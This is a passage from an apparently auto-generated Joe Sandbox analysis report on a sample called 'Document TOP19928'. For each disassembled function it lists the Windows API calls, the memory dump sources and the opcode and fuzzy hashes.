Instruction Fuzzy Hash: C5314C71A10B0AEFCB18DF2DC484A6DB7B6FF48310F14862AE81993714D775B960DBA0

Function 008100D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 008100E1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a56c181919ed3851637f5967d7dde027314f506fe4802673c2007458ed0ea47e
Instruction ID: 878e4485fbaa8ff396ef47d539c0502c8f87d1d92e7a307898669d0567d27fee
Opcode Fuzzy Hash: a56c181919ed3851637f5967d7dde027314f506fe4802673c2007458ed0ea47e
Instruction Fuzzy Hash: E841F574604341DFDB24DF14C484B1ABBF1BF45318F1989ADE9898B362C77AE885CB52

Function 007D4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 007D4D4D

Part of subcall function 007F548B: __wfsopen.LIBCMT ref: 007F5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4F6F

Part of subcall function 007D4CC8: FreeLibrary.KERNEL32(00000000), ref: 007D4D02

Part of subcall function 007D4DD0: _memmove.LIBCMT ref: 007D4E1A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 92922bbad7b72b21679efa8d720dc78ebcaf2f363aaeb392df0308c669c28c62
Instruction ID: 30d7aa5acd1e7a2034e6fb4e45335311030ce03d6fdaf0b909a1c5eb83fe1198
Opcode Fuzzy Hash: 92922bbad7b72b21679efa8d720dc78ebcaf2f363aaeb392df0308c669c28c62
Instruction Fuzzy Hash: 0311E732700709EBCF20BF70CC0AB6E77B5AF40711F10842AF941E63C2DA799A0597A1

Function 008101AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 008101BB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: cc1d2061d4c9cc70ab90d98386bbc9934ec5cfd80ef6f670a36666362172da15
Instruction ID: 3798e54f02098c7f8790059e27d18840e0a20ecaf82e048d629e3229ba3f1ade
Opcode Fuzzy Hash: cc1d2061d4c9cc70ab90d98386bbc9934ec5cfd80ef6f670a36666362172da15
Instruction Fuzzy Hash: F8211574608341DFCB14DF54C445A1ABBF0BF88304F058969E98997721D739E845CB53

Function 007D5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,007D5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 007D5D76

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 77b8cee04012e69c6c1583f10789914b2d684907c6f9c621da3a962fd203831e
Instruction ID: ad7a6eaec78a5d99c96f1ab01a8ffb457d3985a07de67f440c96fb4716e27dbb
Opcode Fuzzy Hash: 77b8cee04012e69c6c1583f10789914b2d684907c6f9c621da3a962fd203831e
Instruction Fuzzy Hash: F3112531200B059FE3208F15C888B62B7FAEB45760F10892EE5AA86A50D7B8E945CF60

Function 007D7F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D7F82

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction ID: 9346d94976fc5e8cee12b04823e484c6b03d9fb15a0369409d9bbe70654e667f
Opcode Fuzzy Hash: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction Fuzzy Hash: 4301D672204705AED7345B28CC06F77BBA8EB44760F10862AF65ACA3D1EA35E401C790

Function 007F4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 007F4AD6

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 8fb53556ad7589767662f4373fb6703ecee1a0096e3b0d2af970dee2bcffb759
Instruction ID: a8181d89837fb7d4912d30648251a46d8e4a06fafac6e273e5ba908af838d126
Opcode Fuzzy Hash: 8fb53556ad7589767662f4373fb6703ecee1a0096e3b0d2af970dee2bcffb759
Instruction Fuzzy Hash: 03F0A471A4020DDBDFA1AF748C0A7BF36A5AF00325F048514B6249A3D1DB7CC951DF51

Function 007D4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4FDE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 683d5209196d4ffee11550cb8527a1cab6470a87a3e54bedc5601b1921b00830
Instruction ID: c62f12d98264a46ac80639e559885e6b16a607fcdd69e8e6b5b4b4d6614e2bec
Opcode Fuzzy Hash: 683d5209196d4ffee11550cb8527a1cab6470a87a3e54bedc5601b1921b00830
Instruction Fuzzy Hash: 99F03971505B12CFCB349F64E494822BBF2BF043293288A3FE2D682720C739A850DF40

Function 007F09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F09F4

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: da8ea14785bb055ddcf220a653fd47cbf9ffc09d07c85e1adab49dc86c9e7507
Instruction ID: da6618e23485ed8e284442b00a4abd4e6da39728ac761e628bc971c05dfed685
Opcode Fuzzy Hash: da8ea14785bb055ddcf220a653fd47cbf9ffc09d07c85e1adab49dc86c9e7507
Instruction Fuzzy Hash: B5E0CD76A0522857C720E65C9C09FFA77EDEF887A1F0401B6FD0CD7345EA649C818691

Function 00839129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0083914B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 5410f81c7b1345e06589a757f186bb51d2de98593d01960fb24307c43dfd6446
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: B6E092B0104B009FDB348A24D8547E373E0FB06315F00081CF2DAD3341EBA6B8418759

Function 00EE08E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00EE08EB

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 49f50212826da9430b25ae10983e7d54175593b2163d10aea966596caac3164e
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: C6E08C71A0524CEBEB24CFB9C808AE973A8DB84320F104654E81AE72C2D5728E80A654

Function 007D5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0080E16B,?,?,00000000), ref: 007D5DBF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ef64c78cf13030fe7fa61ddcdf1c3f63c745dfd57476e72fa98b503c3daded5f
Instruction ID: e03f1f408f36e83c6b86c2895397eb39c46ed41a0afd312eba615ecd02afc872
Opcode Fuzzy Hash: ef64c78cf13030fe7fa61ddcdf1c3f63c745dfd57476e72fa98b503c3daded5f
Instruction Fuzzy Hash: 73D09E74640208BFE610DB80DC46FAA777CE705711F100194BE049629096B27D508695

Function 00EE08B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00EE08BB

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: ef5576dfe43120188ced8d2c7acd837c1a2eca9ed558df45954d28102a56513b
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 60D0A73090620CEBCB10CFF59C04ADA73ACDB04320F104754FD15E3280D6719D809794

Function 007F548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 007F5496

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a70d08863a4f62d3b1bdd74e5cd7f4e2e56b177f578f09832beabbf55ac434c9
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: ABB0927684020CB7DE012E82EC02A693F199B40678F808020FB0C18262A677A6A09689

Function 0083D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0083D46A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0dbc9254ab6a34eaf6df46bcc432e9ca909f8a074ba743d364c26fb1ae523088
Instruction ID: 25a83b6d1741f0eefb6cdeed4fae5eb60f0cd0e6a61af47461e3c3dad77689f1
Opcode Fuzzy Hash: 0dbc9254ab6a34eaf6df46bcc432e9ca909f8a074ba743d364c26fb1ae523088
Instruction Fuzzy Hash: 34713D30204702DFC714EF24D495A6AB7F4FF88314F044A6DF5969B3A2DB34A945CB92

Function 007F0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007F0EF7

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b9ddafcf543529c346a5d2ca5f35d1de054b7aa19ed156de4de96f4083941126
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6031C471A00109DFC718EF58D480969F7A6FF59301B688AA5E50ACB752D735EDC1CBC0

Function 00EE229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00EE22B1

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: cf327be42f78b080b7e49be4fd034e725134c2f85d3152e6678289aaa9a3a968
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 01E0BF7494010EEFDB00EFA4D5496DE7BB4EF04311F1005A5FE05E7690DB309E548A62

Function 00EE22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00EE22B1

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 465135042a708b83e7f8f4d6b7e85134afe70fa155e648f43dcce05f5eca4315
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 62E0E67494010EDFDB00EFB4D54969E7FB4EF04301F100165FD01E2280D6309D508A72

Non-executed Functions

Function 0085CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0085CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0085CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CF00
SendMessageW.USER32 ref: 0085CF29
_wcsncpy.LIBCMT ref: 0085CFA1
GetKeyState.USER32(00000011), ref: 0085CFC2
GetKeyState.USER32(00000009), ref: 0085CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CFE5
GetKeyState.USER32(00000010), ref: 0085CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085D018
SendMessageW.USER32 ref: 0085D03F
SendMessageW.USER32(?,00001030,?,0085B602), ref: 0085D145
SetCapture.USER32(?), ref: 0085D177
ClientToScreen.USER32(?,?), ref: 0085D1DC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0085D203
ReleaseCapture.USER32 ref: 0085D20E
GetCursorPos.USER32(?), ref: 0085D248
ScreenToClient.USER32(?,?), ref: 0085D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D2B1
SendMessageW.USER32 ref: 0085D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D31C
SendMessageW.USER32 ref: 0085D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0085D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0085D37B
GetCursorPos.USER32(?), ref: 0085D39B
ScreenToClient.USER32(?,?), ref: 0085D3A8
GetParent.USER32(?), ref: 0085D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D431
SendMessageW.USER32 ref: 0085D462
ClientToScreen.USER32(?,?), ref: 0085D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0085D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D51A
SendMessageW.USER32 ref: 0085D53D
ClientToScreen.USER32(?,?), ref: 0085D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0085D5C3

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetWindowLongW.USER32(?,000000F0), ref: 0085D65F

Strings

F, xrefs: 0085D543
@GUI_DRAGID, xrefs: 0085D1AA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 302779176-4164748364
Opcode ID: e8e1bbb9b019a39de917167bbae016a0a8d33a36a7758099b9afe97668b9c593
Instruction ID: 99f35c95db4a3e996c547d97d2fbd80857477fe8136fd5750dfa15a235a65b8b
Opcode Fuzzy Hash: e8e1bbb9b019a39de917167bbae016a0a8d33a36a7758099b9afe97668b9c593
Instruction Fuzzy Hash: 5942AD34204341AFDB21DF28C888EAABBF5FF48316F140529FA55D72A1D7319859CF92

Function 0085804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0085873F

Strings

